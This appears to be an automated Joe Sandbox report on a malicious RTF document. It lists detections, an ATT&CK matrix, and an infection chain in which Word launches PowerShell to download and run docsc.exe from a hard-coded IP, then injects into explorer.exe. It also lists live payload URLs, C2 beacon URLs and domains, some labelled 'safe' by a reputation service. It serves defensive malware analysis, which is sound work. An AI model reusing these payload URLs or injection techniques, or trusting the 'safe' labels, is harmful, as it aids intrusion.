          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection611Masquerading1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Process Injection611NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 412069 Sample: 1c60a1e9_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 56 www.4520oceanviewavenue.com 2->56 58 4520oceanviewavenue.com 2->58 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 18 other signatures 2->74 12 WINWORD.EXE 293 39 2->12         started        signatures3 process4 file5 46 C:\Users\user\AppData\Local\...\docsc[1].exe, PE32 12->46 dropped 48 C:\Users\user\AppData\Local\...\FLDA58.tmp, 370 12->48 dropped 50 C:\Users\user\AppData\...\Abctfhghgdghgh .ScT, data 12->50 dropped 52 C:\Users\user\AppData\Local\...\F3A4D79D.png, 370 12->52 dropped 94 Document exploit detected (creates forbidden files) 12->94 96 Suspicious powershell command line found 12->96 98 Tries to download and execute files (via powershell) 12->98 100 Microsoft Office creates scripting files 12->100 16 powershell.exe 12 7 12->16         started        21 powershell.exe 7 12->21         started        23 powershell.exe 7 12->23         started        25 FLTLDR.EXE 12->25         started        signatures6 process7 dnsIp8 54 157.55.173.72, 49165, 49166, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->54 44 C:\Users\user\AppData\Roaming\docsc.exe, PE32 16->44 dropped 66 Powershell drops PE file 16->66 27 docsc.exe 16->27         started        file9 signatures10 process11 signatures12 86 Detected unpacking (changes PE section rights) 27->86 88 Machine Learning detection for dropped file 27->88 90 Tries to detect virtualization through RDTSC time measurements 27->90 92 2 other signatures 27->92 30 docsc.exe 27->30         started        33 docsc.exe 27->33         started        process13 signatures14 102 Modifies the context of a thread in another process (thread injection) 30->102 104 Maps a DLL or memory area into another process 30->104 106 Sample uses process hollowing technique 30->106 108 Queues an APC in another process (thread injection) 30->108 35 explorer.exe 30->35 injected process15 dnsIp16 60 www.thepocket-onlinelesson.xyz 202.210.8.86, 49168, 80 VECTANTARTERIANetworksCorporationJP Japan 35->60 62 ethereumdailypay.com 209.143.158.10, 49172, 80 ILANDUS United States 35->62 64 13 other IPs or domains 35->64 76 System process connects to network (likely due to code injection or exploit) 35->76 78 Performs DNS queries to domains with low reputation 35->78 39 NAPSTAT.EXE 35->39         started        signatures17 process18 signatures19 80 Modifies the context of a thread in another process (thread injection) 39->80 82 Maps a DLL or memory area into another process 39->82 84 Tries to detect virtualization through RDTSC time measurements 39->84 42 cmd.exe 39->42         started        process20

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1c60a1e9_by_Libranalysis.rtf32%ReversingLabsScript-WScript.Trojan.RTFObfustream

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\docsc.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.docsc.exe.bd0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          12.2.docsc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          betsysellsswfl.com0%VirustotalBrowse
          www.applewholesales.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          httP://157.55.173.72/goose/do0%Avira URL Cloudsafe
          http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV0%Avira URL Cloudsafe
          http://157.55.173.72/goose/docsc.exe0%Avira URL Cloudsafe
          www.rogegalmish.com/a8si/0%Avira URL Cloudsafe
          httP://157.55.173.72/goose/docsc0%Avira URL Cloudsafe
          http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA==0%Avira URL Cloudsafe
          http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV0%Avira URL Cloudsafe
          httP://157.55.170%Avira URL Cloudsafe
          http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg==0%Avira URL Cloudsafe
          httP://157.55.173.72/goose/docsc.exePE10%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg==0%Avira URL Cloudsafe
          http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV0%Avira URL Cloudsafe
          httP://157.55.0%Avira URL Cloudsafe
          http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV0%Avira URL Cloudsafe
          http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg==0%Avira URL Cloudsafe
          http://157.55.173.720%Avira URL Cloudsafe
          httP://157.55.173.72/go0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          4520oceanviewavenue.com
          		184.168.131.241
          		truetrue
            		unknown
            betsysellsswfl.com
            		107.155.89.74
            		truetrueunknown
            ethereumdailypay.com
            		209.143.158.10
            		truetrue
              		unknown
              www.applewholesales.com
              		75.2.115.196
              		truetrueunknown
              www.thepocket-onlinelesson.xyz
              		202.210.8.86
              		truetrue
                		unknown
                uixie.porkbun.com
                		44.230.85.241
                		truefalse
                  		high
                  boostcoachingonline.com
                  		184.168.131.241
                  		truetrue
                    		unknown
                    southernbrushworks.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      www.boostcoachingonline.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.foreverjsdesigns.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.southernbrushworks.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ethereumdailypay.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.qqkit.net
                              		unknown
                              		unknowntrue
                                		unknown
                                www.4520oceanviewavenue.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.betsysellsswfl.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.foreverjsdesigns.com/a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOVtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://157.55.173.72/goose/docsc.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    www.rogegalmish.com/a8si/true
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.ethereumdailypay.com/a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOVtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.boostcoachingonline.com/a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.southernbrushworks.com/a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg==false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOVtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.applewholesales.com/a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOVtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.4520oceanviewavenue.com/a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg==true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.piriform.com/ccleanerhttp://KKpowershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpfalse
                                      		high
                                      httP://157.55.173.72/goose/dopowershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpfalse
                                          		high
                                          httP://157.55.173.72/goose/docscpowershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          httP://157.55.173.72/goose/docsc.exepowershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmptrue
                                            		unknown
                                            httP://157.55.17powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		low
                                            httP://157.55.173.72/goose/docsc.exePE1powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.piriform.com/ccleanerpowershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpfalse
                                              		high
                                              http://www.%s.comPApowershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		low
                                              httP://157.55.powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		low
                                              http://157.55.173.72powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              httP://157.55.173.72/gopowershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              209.143.158.10
                                              		ethereumdailypay.comUnited States
                                              		14127ILANDUStrue
                                              75.2.115.196
                                              		www.applewholesales.comUnited States
                                              		16509AMAZON-02UStrue
                                              202.210.8.86
                                              		www.thepocket-onlinelesson.xyzJapan2519VECTANTARTERIANetworksCorporationJPtrue
                                              44.230.85.241
                                              		uixie.porkbun.comUnited States
                                              		16509AMAZON-02USfalse
                                              34.102.136.180
                                              		southernbrushworks.comUnited States
                                              		15169GOOGLEUSfalse
                                              157.55.173.72
                                              		unknownUnited States
                                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                              184.168.131.241
                                              		4520oceanviewavenue.comUnited States
                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                              107.155.89.74
                                              		betsysellsswfl.comUnited States
                                              		29802HVC-ASUStrue

                                              Private

                                              IP
                                              192.168.2.22
                                              192.168.2.255

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:412069
                                              Start date:12.05.2021
                                              Start time:11:32:45
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 52s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:1c60a1e9_by_Libranalysis (renamed file extension from none to rtf)
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:16
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winRTF@20/17@9/10
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 16.4% (good quality ratio 15.1%)
                                              • Quality average: 66.6%
                                              • Quality standard deviation: 30%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • TCP Packets have been reduced to 100
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:33:41API Interceptor69x Sleep call for process: powershell.exe modified
                                              11:33:45API Interceptor82x Sleep call for process: docsc.exe modified
                                              11:34:10API Interceptor209x Sleep call for process: NAPSTAT.EXE modified
                                              11:35:01API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              75.2.115.196New_Order.exeGet hashmaliciousBrowse
                                              • www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT
                                              PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                              • www.neverpossible.com/nyr/?hFN=HMvQt6bkCevDbBHl57tIpg2VEEGTCu7btVM4jmpr9u1g6ochkRM7DKqFK8ehddD2fJuq&znp8sT=8pwxRHeHx
                                              file.exeGet hashmaliciousBrowse
                                              • www.officialtimelessbeauty.com/ud9e/?8pK0l4=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&EhU45z=gdJpOxNhdV
                                              file.exeGet hashmaliciousBrowse
                                              • www.officialtimelessbeauty.com/ud9e/?KtxD=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&p0D=AdhDQXr
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • www.officialtimelessbeauty.com/ud9e/?M6cphXg=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdcnguIyvoQlJN&VtX8=J48HPvgx
                                              raw f.exeGet hashmaliciousBrowse
                                              • www.officialtimelessbeauty.com/ud9e/?inCTmJ0x=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&lnxdA=rBZlir70eHDp
                                              44.230.85.241win32.exeGet hashmaliciousBrowse
                                              • www.leagueofconsciouscreatives.com/hx3a/?UR-hC=00Gdc830MjwppviP&ETPPOfO=Z+JplkT88/cA/L14tHfej1KuR/WXUTalQiDPTDA6hhHH4vrlYKoY+HvBwUu7Y82Qoonw
                                              IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                              • www.leagueofconsciouscreatives.com/hx3a/?rJ=w0G8E6&df=Z+JplkT584cE/b50vHfej1KuR/WXUTalQibfPAc7lBHG4eHjfa5UoDXDzyi9TNib9OTHnQ==
                                              RQ100932871.exeGet hashmaliciousBrowse
                                              • www.101farts.com/ckr/
                                              157.55.173.72EBqJhAymeE.rtfGet hashmaliciousBrowse
                                              • 157.55.173.72/music/play.exe
                                              184.168.131.241INv02938727.exeGet hashmaliciousBrowse
                                              • www.sequenceanalytica.com/kkt/?n8=WT801LO0&ItLd=beAPPUpQq3bTf0wVpdVGLtZQUj/Y58U/IZEW6sslvUZTyjBteEnfLFfdWI9VdBzisWFD4iTcDg==
                                              ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                              • www.reservesunbeds.com/u8nw/?yVUx=0BIXczdHaL8h5fn&hb8Tz=k2CKzalxf+HTI/YA5ZUZEbPplHxW2QsGEOhR0/8w4ZbDPb6D4jRkh7SQnOJYmVIWFsdJ
                                              PO-UTITECH 0511.exeGet hashmaliciousBrowse
                                              • www.youporn-live.net/sve/?hL=-Z3dvB&0nK83v=C8vvv0MaX2y/U2Z3Q9rasdODAQyMwmTqNTEWmqcd52/p7ch4zX9D9XByyfQTmXdQf7CQjqgJug==
                                              POI09876OIUY.exeGet hashmaliciousBrowse
                                              • www.ssssummit.com/uv34/?9rx=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0&bJ=_P2pFHQpqJUh
                                              4si5VtPNTe.exeGet hashmaliciousBrowse
                                              • www.brlnathletics.com/bucw/?APw8=MCIZYDzPkuscjpMKn6eGoQ/RcoYF14tLcsdPKcaWzW+X8DCZGW/2r27VfqhEjcQn85UoKzeBLw==&b62T=5jlLiNy09
                                              invscan052021.exeGet hashmaliciousBrowse
                                              • www.schmelzens.com/ued5/?5jRt=mdMCgS9ILlmCGgqJcZiXF4nHlR4RxT7ynU5KvIund6ihpo8hKpkex0rM9NCAHKrGECmZ&2dTH=c6AhPR10EV7lG
                                              da.exeGet hashmaliciousBrowse
                                              • www.palomachurch.com/8u3b/?dZ8=BT0h&hDKxoPS=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU7vIR5fuSTVT5I6wDQ==
                                              Payment.xlsxGet hashmaliciousBrowse
                                              • www.ottawahomevalues.info/8u3b/?zh=xUmcyzOh4HdFuvhunHHAKcZZd7JmKNqhEswdgXWKPEcA2epsJKzScQzpRfSI4u1UmTOkNQ==&BL3=jFNt_dFXS
                                              PURCHASE ORDER 5112101.xlsxGet hashmaliciousBrowse
                                              • www.myrootsandtrees.com/bucw/?btx=2DQmETE5ym4XCRWr28zmwwOJR5akFTB0jDotWvpECgLZnABSzS3kskU/ZtiFd8SyHqCl+w==&LzrL=u2M8sjUhfhtp-z
                                              Materialliste f#U00fcr Angebot.exeGet hashmaliciousBrowse
                                              • www.universallypc.com/mbg/?d4tTFV0x=JHtrtDQJDTvHmQjdlZxCkdFPYzqLg9GX2wZONh07d53HiePR7Au08rIVTnC7FKbvwxp0DBK+2w==&vP=9rQPzxEXvpg8-Jrp
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?wJB=-ZLXOP0XzvBHZPRp&jZhtajbP=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
                                              New Order.exeGet hashmaliciousBrowse
                                              • www.britainblog.com/un8c/?a2MLWLu=ScSc7+wN2fhzbElO1qeWCW9UaeY5Q5s50OV0RzK60v9iEHECxnAHbwg3oRc1uopK9S++&l4=1bNDCf9Pbhw
                                              FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                              • www.myrootsandtrees.com/bucw/?4hlPBD=2DQmETE8yh4TCBan08zmwwOJR5akFTB0jDw9Ks1FGALYnxtU0Cmo6gs9aLiDFdK6Lc2EnGtSNQ==&l0GD1=xBZDi6rpmLdp-
                                              PURCHASE ORDER.xlsxGet hashmaliciousBrowse
                                              • www.no-dietdiet.com/bucw/?e6=dxodHDGP&zdM0JRXx=AaevXC6Zw/dWc9ErEUUud//xoPiFgQsvnIBpIpcw4NMsFbTc+swprThfuXKMl6XX0OSdQw==
                                              cks.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?f0=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFl1EB/LkRBfGe9jhg==&6l6x=E4ClVdU
                                              4LkSpeVqKR.exeGet hashmaliciousBrowse
                                              • www.montcoimmigrationlawyer.com/uoe8/?rDHpw=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&V2=LhqpTfJ8
                                              0a97784c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                              • www.leafylyfe.com/et9g/?BZ6=TF/YS3LdfnvKlPm037wYtLAt8WY6EQJ7LI+z0LNg8R7H3LFT4rrA/oRIWqbTaqJ76YkP/g==&bdC=7njp7th
                                              new order.xlsxGet hashmaliciousBrowse
                                              • www.montcoimmigrationlawyer.com/uoe8/?PbvtUz=DVW7OxuWilp3hUkhBzIJzGfsiMq3vXOqW3XcgnFXnAhOJxKbpl47XK0K/rgsfP0Uf/nXgQ==&-Z=zVeT
                                              Order Euro 890,000.exeGet hashmaliciousBrowse
                                              • www.anvistanes.com/nbg/?AnE=N0DpoDyPy2&GzuDf=n4dYPyDMx0k3VV9rtAXeD+dEmxGAmcHEEuMb7hMO7KemGcZmCd/seF3bHBRuXqx2nn1q
                                              Request for Quotation.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?K8b8q=AbsdphHPUnHTPv7&Q2M=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              uixie.porkbun.comwin32.exeGet hashmaliciousBrowse
                                              • 44.230.85.241
                                              IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                              • 44.230.85.241
                                              SWIFT001_jpg.exeGet hashmaliciousBrowse
                                              • 52.33.207.7
                                              PotentialAPT.exeGet hashmaliciousBrowse
                                              • 52.33.207.7
                                              Breve-Tufvassons sp.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                              • 52.33.207.7
                                              RNM56670112.exeGet hashmaliciousBrowse
                                              • 52.33.207.7
                                              COVID-19FluA+B Antigen Combo Rapid Test.exeGet hashmaliciousBrowse
                                              • 52.33.207.7
                                              RQ100932871.exeGet hashmaliciousBrowse
                                              • 44.230.85.241

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              VECTANTARTERIANetworksCorporationJPPurchase Inquiry 11.05.2021.exeGet hashmaliciousBrowse
                                              • 202.210.8.60
                                              0876543123.exeGet hashmaliciousBrowse
                                              • 202.210.8.120
                                              Project Decision 2021.exeGet hashmaliciousBrowse
                                              • 183.181.86.59
                                              S4gONKzrzB.exeGet hashmaliciousBrowse
                                              • 210.131.150.117
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • 202.210.8.149
                                              VIKRAMQST21-222.exeGet hashmaliciousBrowse
                                              • 202.210.8.149
                                              MGuvcs6OczGet hashmaliciousBrowse
                                              • 157.14.182.109
                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                              • 103.141.96.11
                                              9JFrEPf5w7.exeGet hashmaliciousBrowse
                                              • 103.15.186.68
                                              Purchase Order.xlsxGet hashmaliciousBrowse
                                              • 103.15.186.68
                                              PO91361.exeGet hashmaliciousBrowse
                                              • 103.15.186.10
                                              ccavero@hycite.com.htmGet hashmaliciousBrowse
                                              • 203.114.55.132
                                              MV Sky Marine.xlsxGet hashmaliciousBrowse
                                              • 202.210.8.141
                                              SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                              • 202.210.8.141
                                              MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                              • 120.51.34.254
                                              SHED.EXEGet hashmaliciousBrowse
                                              • 103.141.96.21
                                              swift copy pdf.exeGet hashmaliciousBrowse
                                              • 183.181.84.122
                                              shipping docs of MT20410.exeGet hashmaliciousBrowse
                                              • 183.181.84.122
                                              PO#4503527426.xlsxGet hashmaliciousBrowse
                                              • 43.249.241.188
